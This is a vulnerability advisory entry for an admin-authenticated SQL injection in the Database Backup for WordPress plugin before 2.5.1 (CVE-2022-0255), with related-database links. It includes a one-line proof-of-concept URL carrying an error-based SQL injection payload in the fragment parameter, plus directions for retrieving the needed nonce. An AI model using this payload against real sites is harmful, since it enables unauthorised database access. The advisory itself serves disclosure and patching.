Lucene search
JrXnmWPVDB-ID:684BB06D-864F-4CBA-AB0D-F83974D026FAHistoryJan 24, 2022 - 12:00 a.m.
Database Backup for WordPress < 2.5.1 - Admin+ SQL Injection
2022-01-2400:00:00
JrXnm
wpscan.com
8
wordpress
sql injection
admin dashboard
EPSS
0.001
Percentile
37.7%
The plugin does not properly sanitise and escape the fragment parameter before using it in a SQL statement in the admin dashboard, leading to a SQL injection issue
PoC
https://example.com/wp-admin/?fragment=select updatexml(1,concat(0x7e,(select user())),0)::2.txt&_wpnonce=7347278aca The nonce can be retrieved from the “Backup Now” and “Scheduled Backup” tabs of the plugin (/wp-admin/tools.php?page=wp-db-backup), look for action=save_backup_time&_wpnonce= in the source
Related
cve
cve
CVE-2022-0255
2022-02-21 11:15:09
patchstack
patchstack
nvd
nvd
CVE-2022-0255
2022-02-21 11:15:09
prion
prion
Sql injection
2022-02-21 11:15:00
wpexploit
wpexploit
Database Backup for WordPress < 2.5.1 - Admin+ SQL Injection
2022-01-24 00:00:00
cvelist
cvelist
CVE-2022-0255 Database Backup for WordPress < 2.5.1 - Admin+ SQL Injection
2022-02-21 10:46:11
openvas
openvas
WordPress Database Backup for WordPress Plugin < 2.5.1 SQLi Vulnerability
2022-03-01 00:00:00